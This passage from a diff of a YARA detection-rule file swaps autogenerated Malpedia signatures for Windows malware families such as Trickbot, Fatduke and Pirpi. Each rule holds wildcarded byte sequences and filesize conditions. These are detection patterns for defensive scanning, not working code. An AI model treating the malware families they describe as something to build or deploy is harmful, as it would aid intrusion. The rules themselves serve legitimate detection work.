+		$sequence_1 = { 8bc6 c1e710 e8???????? 0fb7c0 0bc7 8945cc }
+		$sequence_2 = { 8b4514 5f 85c0 7402 8930 e8???????? 33c0 }
+		$sequence_3 = { 46 3bf2 72c2 5f 5e 33c0 66890451 }
+		$sequence_4 = { 8d55e0 894df4 e8???????? 897dfc 66393d???????? 0f8487000000 53 }
+		$sequence_5 = { 837e2421 c645fa00 722d 6a0e 8d7dc0 }
+		$sequence_6 = { 85d2 741a 8d4618 8b08 85c9 7611 50 }
+		$sequence_7 = { 85f6 7628 57 8d7c3602 85ff 741e 8bc7 }
+		$sequence_8 = { 8b44242c e8???????? 83671800 83671c00 68???????? 68???????? ff7510 }
+		$sequence_9 = { 8d856cfeffff 50 e8???????? 8bcf 899de0fdffff }
 
 	condition:
-		7 of them and filesize < 65536
+		7 of them and filesize < 434176
 }
-rule MALPEDIA_Win_Sappycache_Auto : FILE
+rule MALPEDIA_Win_Acridrain_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5cde3466-1a40-5c62-84c0-18f8fb0eb5bd"
+		id = "fcb90d8e-aad2-5dfa-b2aa-c88c9fb392e4"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sappycache"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sappycache_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.acridrain"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.acridrain_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "accd6826861cb14b3264b0a3eac9debd4934e0de6f313d816d6bcd533efab795"
+		logic_hash = "445c602d5a9107fcce82aaaf7b300d7763f0b08be8d23fd5ad6910688300093b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -106293,32 +106448,32 @@ rule MALPEDIA_Win_Sappycache_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 48c1e109 4903cc e8???????? 488b5c2448 83f801 754c 8b542440 }
-		$sequence_1 = { 736c 488bf3 4c8bf3 49c1fe06 4c8d2d36da0000 }
-		$sequence_2 = { 8bea 0f1f8000000000 e8???????? 448bf0 }
-		$sequence_3 = { 4933d0 4a8794f150800100 eb2d 4c8b05???????? ebb1 }
-		$sequence_4 = { 0f84d1fcffff 418bfd 44896d80 498bdd 0f1f440000 33d2 488d8d20420000 }
-		$sequence_5 = { 488d1541900000 e8???????? 488bd8 4885c0 740f }
-		$sequence_6 = { 488bcf ff15???????? b801000000 488b6c2440 488b742448 488b7c2450 488b4c2428 }
-		$sequence_7 = { e8???????? 85c0 7407 b902000000 cd29 488d0d434b0100 }
-		$sequence_8 = { 3b15???????? 7350 488bca 4c8d05f9ca0000 83e13f 488bc2 48c1f806 }
-		$sequence_9 = { 488d05133c0100 ffcb 488d0c9b 488d0cc8 ff15???????? ff0d???????? 85db }
+		$sequence_0 = { ff37 e8???????? 83c40c 8945e4 85c0 7421 6a30 }
+		$sequence_1 = { e9???????? 8b8538d2ffff 8b8d3cd2ffff 8bbd4cd2ffff 8b9594d2ffff 898590d2ffff 8b8550d2ffff }
+		$sequence_2 = { c744881000000000 eb32 8b16 807a4100 752a 8b4708 8d0c80 }
+		$sequence_3 = { be???????? e8???????? 83c408 85c0 0f84a6000000 5f 5e }
+		$sequence_4 = { ff7514 51 e8???????? 83c418 33c0 5f 8be5 }
+		$sequence_5 = { ff30 8b442420 0534030000 50 e8???????? 83c408 8bd8 }
+		$sequence_6 = { 7fc5 8b4510 8b4d08 99 034514 5f 135518 }
+		$sequence_7 = { 8d4705 8b7c2428 03f8 897c2428 13ee ff15???????? 8d44241c }
+		$sequence_8 = { ff7504 55 e8???????? 83c40c 85c0 742b 8b4704 }
+		$sequence_9 = { 8bf8 ff15???????? 83c410 85ff 0f84bb000000 8bc7 5f }
 
 	condition:
-		7 of them and filesize < 262144
+		7 of them and filesize < 2244608
 }
-rule MALPEDIA_Win_Ruckguv_Auto : FILE
+rule MALPEDIA_Win_Unidentified_080_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8f499e75-91f2-52c8-a94a-c83686f92c36"
+		id = "2fada674-370f-5bc5-84a9-2e5ff9925df1"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ruckguv"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ruckguv_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_080"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_080_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "6d10b38eb1f1d62aeb4e76b727620952b9c0cf6c443b89f37ac94de3a6d9e6ee"
+		logic_hash = "f4698b30ea4cfaea5b3dd4c3d2fb3772007307dc7944cfe2e7ccc981a278d898"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -106332,32 +106487,32 @@ rule MALPEDIA_Win_Ruckguv_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 53 56 fe4513 0fb64d13 8d3401 8a16 0055ff }
-		$sequence_1 = { 85c0 747f 56 03c3 50 e8???????? }
-		$sequence_2 = { 8b4834 3bf1 7504 b001 eb7c 8b80a0000000 }
-		$sequence_3 = { 6a01 e8???????? 83c428 8d8da0feffff 51 }
-		$sequence_4 = { 05f8000000 813f50450000 894508 0f851c010000 8b5f50 68fe6a7a69 }
-		$sequence_5 = { 0fb645fe 03c1 8a18 fe45ff 881e 8810 660fb645ff }
-		$sequence_6 = { 8d859cfdffff 50 68???????? e8???????? 6814f1f808 6a01 897558 }
-		$sequence_7 = { ff74240c ff74240c ffd0 c3 685f70353a 6a01 e8???????? }
-		$sequence_8 = { 8b37 85f6 7503 8b7710 03f3 }
-		$sequence_9 = { 53 33d2 56 57 8855ff 8855fe 889100010000 }
+		$sequence_0 = { c7859cfdffff34290210 c685a4fdffff0f 89bda8fdffff 89bdacfdffff 89bdb0fdffff 89bdb4fdffff 89bdb8fdffff }
+		$sequence_1 = { 8b4df8 8b55f0 53 51 52 e8???????? }
+		$sequence_2 = { 6a04 57 56 c645fc08 ff15???????? 85c0 7504 }
+		$sequence_3 = { 8b742414 83c6f4 81fe???????? 7414 56 ff15???????? }
+		$sequence_4 = { 8b4e14 894f14 8b5618 895718 8b461c 8378f400 8d4f1c }
+		$sequence_5 = { 8b4604 57 33ff 3bc7 7439 8b4e0c }
+		$sequence_6 = { 0f95c1 8d5a01 53 85c9 740b 50 e8???????? }
+		$sequence_7 = { 83ec14 8d45d0 8bf4 8965e4 50 }
+		$sequence_8 = { 6804900000 c707???????? e8???????? 6804500000 894704 e8???????? 894708 }
+		$sequence_9 = { 85c0 7456 8dbda4fdffff e8???????? 8bc7 50 b8???????? }
 
 	condition:
-		7 of them and filesize < 41024
+		7 of them and filesize < 392192
 }
-rule MALPEDIA_Win_Reaver_Auto : FILE
+rule MALPEDIA_Win_Acronym_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3d8bacff-8149-5ea1-b108-9a71e294cb35"
+		id = "c38cb44e-5275-529c-849b-aac482405c26"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.reaver"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.reaver_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.acronym"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.acronym_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "48c5b411e85068c0dc8fd141ff59dabcc3c0e5a62fed45c81149c84c9623f348"
+		logic_hash = "62c9feab89deca514303e2d96ba97df762d7107dad9f170f73597a4727ca0781"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -106371,32 +106526,32 @@ rule MALPEDIA_Win_Reaver_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 85c0 7440 8b45f4 6a00 }
-		$sequence_1 = { 3d14050000 7504 33c0 c9 c3 }
-		$sequence_2 = { 50 68ff010f00 ff15???????? 50 ff15???????? 85c0 7453 }
-		$sequence_3 = { 740d ff15???????? 3d14050000 7504 33c0 c9 }
-		$sequence_4 = { 85c0 7440 8b45f4 6a00 8945e8 }
-		$sequence_5 = { 85c0 740d ff15???????? 3d14050000 7504 33c0 c9 }
-		$sequence_6 = { 7440 8b45f4 6a00 8945e8 }
-		$sequence_7 = { 7504 33c0 c9 c3 ff75fc ff15???????? 6a01 }
-		$sequence_8 = { 8bec 83ec1c 8d45fc 50 68ff010f00 ff15???????? }
-		$sequence_9 = { 6a00 ff15???????? 85c0 7440 8b45f4 }
+		$sequence_0 = { 8b4da4 8b5508 8b8578ffffff 89048a 8b4d9c 83c101 894d9c }
+		$sequence_1 = { 8b4dfc 8b4904 e8???????? 8b55f4 8955d0 8b45d0 }
+		$sequence_2 = { 8bb540e5ffff e9???????? 8bb540e5ffff e9???????? 8b8530e5ffff 8b048590174300 f644060480 }
+		$sequence_3 = { 754f 8b0d???????? e8???????? 85c0 753a 33c9 75fc }
+		$sequence_4 = { 0fb754415e 8b45ec 69c008040000 8b4d08 8d840160b10000 8b0c90 }
+		$sequence_5 = { 8945f8 33d2 75fc 837df800 0f8cd6020000 33c0 75fc }
+		$sequence_6 = { 8b45fc 894220 8b4d08 c7410800000000 8b5508 c7420c00000000 8b4508 }
+		$sequence_7 = { 8b45b0 894415d0 b904000000 6bc900 }
+		$sequence_8 = { c1e306 8b048590174300 0fbe441804 83e001 7470 57 }
+		$sequence_9 = { 50 8b4d08 83c108 51 8b0d???????? e8???????? 8b08 }
 
 	condition:
-		7 of them and filesize < 106496
+		7 of them and filesize < 466944
 }
-rule MALPEDIA_Win_Ariabody_Auto : FILE
+rule MALPEDIA_Win_Pirpi_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "09c48148-a35c-5dbf-9884-3f4ca9e8942d"
+		id = "87b6b6f2-e4ed-52ab-9d18-a97a5c488a2f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ariabody"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ariabody_auto.yar#L1-L167"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pirpi"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pirpi_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "d2889556cedcf38c4ea9e1f0b840f1fda159a165dc69125aae39d5a13e01fecd"
+		logic_hash = "ac2a9b729be997048deec428ae0fd8035f83f34266d3bcf665ee32e11696cc21"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -106410,38 +106565,32 @@ rule MALPEDIA_Win_Ariabody_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 2bd1 8a01 84c0 7406 3ac3 7402 }
-		$sequence_1 = { 8d55fc 03f9 e8???????? 59 }
-		$sequence_2 = { eb13 8b16 8bcf e8???????? }
-		$sequence_3 = { 8bcf 0fb6c0 50 ff75fc }
-		$sequence_4 = { 50 ff5204 8b1e 8bd0 }
-		$sequence_5 = { 50 8d040a 50 57 }
-		$sequence_6 = { 8d0c30 ffd1 8bc6 5f }
-		$sequence_7 = { 83ec50 53 57 8bd9 }
-		$sequence_8 = { 4889e9 8984247a020000 c784248e02000032303000 c7842460020000434f4e4e }
-		$sequence_9 = { 4c03f7 4c8b4c3d00 4c8d6c2f08 4d85c9 7444 48bd0000000000000080 4985e9 }
-		$sequence_10 = { ff15???????? 488d15e5780000 483305???????? 488bcb 488905???????? ff15???????? 488d15df780000 }
-		$sequence_11 = { 488b81f0000000 488bd9 4885c0 7479 488d0ddad00000 483bc1 }
-		$sequence_12 = { e9???????? 8b45dc 8d1400 8955dc eb47 488d0d648bffff 4c8d4ddc }
-		$sequence_13 = { 4881eca8020000 4889d7 4889ce 4d89c4 33d2 41b800010000 33c0 }
-		$sequence_14 = { 448850d2 448850d3 448850d4 448850d5 448850d6 448858d7 c740d80b010000 }
-		$sequence_15 = { 488d942492020000 ff96b8010000 4889e9 488d942420020000 ff96b8010000 4889e9 }
+		$sequence_0 = { 894504 e9???????? 8b4c2414 8d442424 50 51 e8???????? }
+		$sequence_1 = { c7470402000000 c744241000000000 8b442414 85c0 7407 50 ff15???????? }
+		$sequence_2 = { ff15???????? 6a01 8d4c244c c68424e400000002 ff15???????? 8b44243c 3bc6 }
+		$sequence_3 = { f7d1 c1e207 49 8d7c0220 8bd1 c1e902 f3a5 }
+		$sequence_4 = { 81c444010000 c3 8b842454010000 85c0 7406 c70000000000 }
+		$sequence_5 = { 5b 81c400010000 c20400 33c9 83f804 0f95c1 49 }
+		$sequence_6 = { 56 50 ffd3 25ff000000 8bcf 50 }
+		$sequence_7 = { 8d0c37 83c603 f7e9 8b45f0 8bca c1e91f 03d1 }
+		$sequence_8 = { 3bc2 7404 33c2 8901 8b442458 83c104 }
+		$sequence_9 = { 55 50 8bce e8???????? 85c0 0f84ad000000 }
 
 	condition:
-		7 of them and filesize < 253952
+		7 of them and filesize < 327680
 }
-rule MALPEDIA_Win_Fatduke_Auto : FILE
+rule MALPEDIA_Win_Atlantida_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "62118afa-94f3-55fc-9df2-3b95dac75d0a"
+		id = "869bb208-99fc-58cc-b6f3-123be4e2dd14"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fatduke"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.fatduke_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.atlantida"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.atlantida_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "2b9fcfe8a4ef7a6057f27cf4a92527f05cca75754ce0db88d74fae66934b4810"
+		logic_hash = "de93365ad64d88523ed488fd5b5635b3ae5e4c0d8a34a9201e696d8414f63e31"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -106455,34 +106604,34 @@ rule MALPEDIA_Win_Fatduke_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ffb610020000 e8???????? 83c404 c786240200000f000000 c7862002000000000000 c6861002000000 c645fc13 }
-		$sequence_1 = { 8d411c 50 8d4dbc e8???????? c645fc01 bb01000000 53 }
-		$sequence_2 = { eb02 8bc6 33d2 668910 51 8bce e8???????? }
-		$sequence_3 = { 8d8d74ffffff e8???????? 8b4d80 b8abaaaa2a 8bbd7cffffff 83c410 2bcf }
-		$sequence_4 = { e8???????? 83c418 50 8d442440 50 8d442464 50 }
-		$sequence_5 = { ffb620030000 e8???????? 83c404 c786340300000f000000 c7863003000000000000 c6862003000000 c645fc1d }
-		$sequence_6 = { 8bce e8???????? 33c0 c745e800000000 c745ec00000000 c745ec07000000 c745e800000000 }
-		$sequence_7 = { e9???????? 8b7508 8d442414 6880000000 6a00 50 32db }
-		$sequence_8 = { c786340300000f000000 c7863003000000000000 c6862003000000 c645fc1f 83be1c03000010 720e ffb608030000 }
-		$sequence_9 = { ff7728 e8???????? 83c404 c7473c0f000000 c7473800000000 c6472800 c645fc00 }
+		$sequence_0 = { 8bfa 3bcf 7459 56 8d7114 6690 8d4e04 }
+		$sequence_1 = { ed f6a3ff1cd671 c1f6a3 ff7082 59 255caf7f8f d34636 }
+		$sequence_2 = { e8???????? c7442400c69a991b e8???????? ba847b1e24 8d8cd226571b73 660fc1d1 8b94576ca2c2b7 }
+		$sequence_3 = { e9???????? d3840c9e29cbff 8994483c5396ff 8bd1 23ca 5a 8b940da629cbff }
+		$sequence_4 = { 8b8c16f7c9e0bd 8d845284cd81f7 0fabd0 8db416fbc9e0bd 52 219414f8c9e0bd 33cb }
+		$sequence_5 = { e8???????? c1c803 33d8 8d14cdbca7077c 52 d3e1 13e8 }
+		$sequence_6 = { ff7508 57 e8???????? 5e 5d c3 56 }
+		$sequence_7 = { ba1b3187c4 f7d2 668b843a1c3187c4 8d9454a4620e89 b918903d41 22cd c1f968 }
+		$sequence_8 = { f6d8 0fca 32d8 660fbafa38 c1e2bb 13c4 c0faa1 }
+		$sequence_9 = { e8???????? 8b13 41 be35e00fe4 41 0fb7ce 6644 }
 
 	condition:
-		7 of them and filesize < 9012224
+		7 of them and filesize < 13793280
 }
-rule MALPEDIA_Win_Shipshape_Auto : FILE
+rule MALPEDIA_Win_Trickbot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "aa7aa2cd-5e40-579e-a131-11724b603c86"
+		id = "b628fd83-f3fd-51c9-94aa-b13e26229dea"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shipshape"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.shipshape_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.trickbot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.trickbot_auto.yar#L1-L652"
 		license_url = "N/A"
-		logic_hash = "b3e2abc875f7ba78a51d88975fa6d3eb42407a4e92394786033a7e1704215a48"
+		logic_hash = "c6087fe2aa4e485109cf9851f9f0a342724e7430c1979121c1548b3fca1551c6"
 		score = 75
-		quality = 75
+		quality = 48
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -106494,32 +106643,101 @@ rule MALPEDIA_Win_Shipshape_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d542438 8d842400070000 52 50 e8???????? 8bfd 83c9ff }
-		$sequence_1 = { 8bcb 8d9424fc050000 83e103 50 f3a4 8d7c243c }
-		$sequence_2 = { 3d???????? 7cf1 56 8bf1 c1e603 3b9678b74000 0f851c010000 }
-		$sequence_3 = { 83e01f c1f905 8b0c8d60d54000 8a44c104 83e040 }
-		$sequence_4 = { 80fb78 7f0e 0fbec3 8a8018a24000 83e00f eb02 }
-		$sequence_5 = { 56 e8???????? 56 e8???????? 83c408 eb09 56 }
-		$sequence_6 = { e8???????? 6a04 68???????? e8???????? 6a0c }
-		$sequence_7 = { 6840420f00 51 52 e8???????? 50 }
-		$sequence_8 = { 8d942434030000 83e103 f3a4 bf???????? 83c9ff }
-		$sequence_9 = { 52 ff15???????? 8d8424b4000000 50 ff15???????? 0c06 }
+		$sequence_0 = { f7d8 1bc0 83e002 83c002 eb0d }
+		$sequence_1 = { 83c002 eb0d 2500000080 f7d8 1bc0 83e007 40 }
+		$sequence_2 = { 83e020 83c020 eb36 2500000080 f7d8 1bc0 }
+		$sequence_3 = { a900000020 7429 a900000040 7411 }
+		$sequence_4 = { 1bc0 83e070 83c010 eb25 a900000040 7411 2500000080 }
+		$sequence_5 = { 7411 2500000080 f7d8 1bc0 83e020 83c020 eb36 }
+		$sequence_6 = { c705????????fdffffff c705????????feffffff c705????????ffffffff e8???????? }
+		$sequence_7 = { 83c724 8b07 a900000020 7429 }
+		$sequence_8 = { 895df8 895df4 895dec 66c745f00005 }
+		$sequence_9 = { 7420 3d7f000004 7419 3d7f000005 7412 3d7f000006 740b }
+		$sequence_10 = { 8b45fc 8d1489 8d0cd0 8b4114 2b410c }
+		$sequence_11 = { 488b01 4c8b4120 488b5118 488b4910 ffd0 }
+		$sequence_12 = { 488b4148 4889442438 488b4140 4889442430 488b4138 4889442428 488b4130 }
+		$sequence_13 = { 488b5118 4889442440 488b4148 4889442438 }
+		$sequence_14 = { 4c8b4928 4c8b4120 488b5118 4889442438 488b4140 4889442430 }
+		$sequence_15 = { 488b4138 4889442428 488b4130 488b4910 4889442420 41ffd2 }
+		$sequence_16 = { 488b4150 4c8b11 4c8b4928 4c8b4120 488b5118 4889442440 }
+		$sequence_17 = { 48397c2430 0f94c3 8bc3 488b5c2450 }
+		$sequence_18 = { 488d4c2450 4533c9 4533c0 ff15???????? 85c0 }
+		$sequence_19 = { 897710 488b742438 488bc7 4883c420 }
+		$sequence_20 = { d1e8 03c2 c1e806 6bc05f }
+		$sequence_21 = { 83780400 7404 8b4008 c3 }
+		$sequence_22 = { 6820bf0200 68905f0100 68905f0100 50 ff15???????? }
+		$sequence_23 = { 51 68e9fd0000 50 e8???????? }
+		$sequence_24 = { 6a40 6800300000 6a70 6a00 }
+		$sequence_25 = { c3 6a01 ff15???????? 50 }
+		$sequence_26 = { e8???????? 6a00 6a28 e8???????? }
+		$sequence_27 = { 8d440002 6a00 50 e8???????? }
+		$sequence_28 = { 8b01 59 03d0 52 }
+		$sequence_29 = { 03d0 52 ebdc 89450c }
+		$sequence_30 = { 488b01 488b4910 ffd0 ba01000000 }
+		$sequence_31 = { 8bc1 66ad 85c0 741c }
+		$sequence_32 = { 85c0 7f0b e8???????? 8b05???????? }
+		$sequence_33 = { e8???????? 83f801 7411 ba0a000000 }
+		$sequence_34 = { 50 8b450c ff4d0c ba28000000 f7e2 }
+		$sequence_35 = { c1e102 2bc1 8b00 894508 }
+		$sequence_36 = { 7405 e8???????? ff15???????? 8bc3 }
+		$sequence_37 = { 741c 3bc1 7213 2bc1 }
+		$sequence_38 = { 59 ff5508 58 894514 8b5510 }
+		$sequence_39 = { 2bc1 8b00 3bc7 72f2 }
+		$sequence_40 = { ff5508 8b5510 8b4a04 ff5508 50 51 }
+		$sequence_41 = { ba28000000 f7e2 8d9500040000 03d0 895510 }
+		$sequence_42 = { 7911 8bc8 e8???????? bb10000000 }
+		$sequence_43 = { 85c0 790f 8bc8 e8???????? 8d5e10 }
+		$sequence_44 = { 8bcf e8???????? 8bf0 85ed }
+		$sequence_45 = { 58 41 41 41 41 }
+		$sequence_46 = { 8b8e88000000 85c9 7514 398e8c000000 }
+		$sequence_47 = { 666666660f1f840000000000 8b4728 8bd6 83f801 }
+		$sequence_48 = { c744242000001f00 ff15???????? 85c0 7911 }
+		$sequence_49 = { 7536 b906000000 8bc1 c3 }
+		$sequence_50 = { 3bd1 0f8293000000 038e8c000000 3bd1 }
+		$sequence_51 = { b9e0000000 663bc1 740b b80b010000 }
+		$sequence_52 = { ff15???????? 8bf0 c1ee1f 83f601 }
+		$sequence_53 = { 41 50 2bc1 8b00 }
+		$sequence_54 = { 8bc8 33c0 85c9 0f95c0 eb02 33c0 }
+		$sequence_55 = { 50 e2fd 8bc7 57 8bec }
+		$sequence_56 = { 894504 68f0ff0000 59 8bf7 8bd7 }
+		$sequence_57 = { 8bc7 e8???????? 85c0 0f849f000000 }
+		$sequence_58 = { 8bf7 8bd7 fc 8bc1 }
+		$sequence_59 = { 8b7d10 2bf9 53 50 }
+		$sequence_60 = { ff15???????? 6a00 6a00 6a00 8d45dc 50 ff15???????? }
+		$sequence_61 = { 8dbf00500310 8bd6 897d08 3bc8 }
+		$sequence_62 = { c745d000500000 817dd000100000 760b 8b45d0 83e801 }
+		$sequence_63 = { c745cc00000000 6a00 685b020000 6a00 }
+		$sequence_64 = { 01dd f361 34aa 61 34aa }
+		$sequence_65 = { e8???????? 8d7de0 e8???????? 8b4dfc }
+		$sequence_66 = { 8bec 56 ff750c 6818280300 }
+		$sequence_67 = { 033d???????? 33c7 8d3c0e 2b75f8 33c7 2bd0 }
+		$sequence_68 = { 83f83c 762a 56 e8???????? 8d044584030101 }
+		$sequence_69 = { 8b45fc 8945c8 8b45d0 40 8945d0 ff75fc }
+		$sequence_70 = { 3d00010000 7d10 8a8c181d010000 888800f80001 40 ebe6 ff35???????? }
+		$sequence_71 = { 51 03cf 51 58 8910 59 5a }
+		$sequence_72 = { ff75fc ff75d0 e8???????? 8b45d0 48 }
+		$sequence_73 = { 8b4dd0 51 6800300400 8b55f8 52 ff15???????? }
+		$sequence_74 = { 83e0fc 03c1 be???????? 8dbf00500310 8bd6 }
+		$sequence_75 = { ff2495701b0001 8bc7 ba03000000 83e904 }
+		$sequence_76 = { c705????????fc6c0001 c705????????ec630001 c705????????4e630001 c705????????da620001 c3 8bff 55 }
+		$sequence_77 = { 12f7 5d 12f7 d93c8c }
+		$sequence_78 = { 7502 eb0c 8d55dc 52 ff15???????? ebcc c745f800000000 }
 
 	condition:
-		7 of them and filesize < 338386
+		7 of them and filesize < 712704
 }
-rule MALPEDIA_Win_Radamant_Auto : FILE
+rule MALPEDIA_Win_Newbounce_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "095ef047-a04b-56b2-b6e4-91844a8ad08b"
+		id = "bdf56a77-5d9e-573d-af2b-c0319e364db4"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.radamant"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.radamant_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.newbounce"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.newbounce_auto.yar#L1-L145"
 		license_url = "N/A"
-		logic_hash = "13bfcc591423cf31741a962660c228f2fa259842a594b9b818753a98c248ff00"
+		logic_hash = "1757d742189e1562595d26ebbaf5e74bc5236d74e3305389104993dc5b138ecf"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -106533,32 +106751,37 @@ rule MALPEDIA_Win_Radamant_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 89c8 0fb68428e8feffff c1e010 3185d0fdffff 8b85d0fdffff }
-		$sequence_1 = { 8b45f4 83c01c 8b00 c1e818 0fb6c0 0fb680b0094100 31d0 }
-		$sequence_2 = { 31c2 8b45e4 0fb6c0 0fb680b01a4100 }
-		$sequence_3 = { 29c1 89c8 83c061 8945ac e8???????? 89c1 }
-		$sequence_4 = { 8945e0 8b4508 89442408 c7442404???????? 8b45e0 }
-		$sequence_5 = { 8d148500000000 01d0 29c1 89c8 83c061 8945ac }
-		$sequence_6 = { 8d85e4feffff 89442414 8d85e8feffff 89442410 }
-		$sequence_7 = { 8944240c 8b4510 89442408 8b45f8 03450c 83c018 }
-		$sequence_8 = { 83ec04 89850cfeffff c744240810000000 8d8508feffff 89442404 8b8520feffff 890424 }
-		$sequence_9 = { e9???????? c745f800000000 837df806 0f8f8d010000 }
+		$sequence_0 = { 83e00f 7e05 2bf0 83c610 }
+		$sequence_1 = { 488bcb 33f6 e8???????? 4889442438 }
+		$sequence_2 = { 488bcb 482bd3 480355ef e8???????? }
+		$sequence_3 = { 488bcb 488905???????? ff15???????? 488bc8 488d1526d60200 }
+		$sequence_4 = { 488bcb 418906 e8???????? b001 }
+		$sequence_5 = { 488bcb 33d2 45895c2404 45892c24 }
+		$sequence_6 = { 488bca e8???????? be00100000 483bc6 735d 488d8f34300000 488bd3 }
+		$sequence_7 = { 488bcb 458d4110 e8???????? 3bf7 }
+		$sequence_8 = { 81e6ff000000 3304b548576300 c1ea08 81e2ff000000 }
+		$sequence_9 = { 81e6ff000000 33048d485f6300 8b34b5485b6300 33c6 33442428 89742420 }
+		$sequence_10 = { 81e6ff000000 8b14b548576300 89542414 8b9424bc000000 }
+		$sequence_11 = { 81e6ff000000 3344242c 8b34b5485b6300 33442410 }
+		$sequence_12 = { 81e6ff000000 3304b548576300 894c2458 33049548536300 }
+		$sequence_13 = { 81e6ff000000 3304b548576300 c1e908 81e1ff000000 }
+		$sequence_14 = { 81e6ff000000 8b34b548536300 81e7ff000000 8b3cbd48576300 }
 
 	condition:
-		7 of them and filesize < 204800
+		7 of them and filesize < 8637440
 }
-rule MALPEDIA_Win_Allaple_Auto : FILE
+rule MALPEDIA_Win_Nightdoor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c8febfcb-b725-537f-8f54-423e8f8493e3"
+		id = "d930ef7f-f999-550e-bc75-97e1e8c7627b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.allaple"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.allaple_auto.yar#L1-L130"
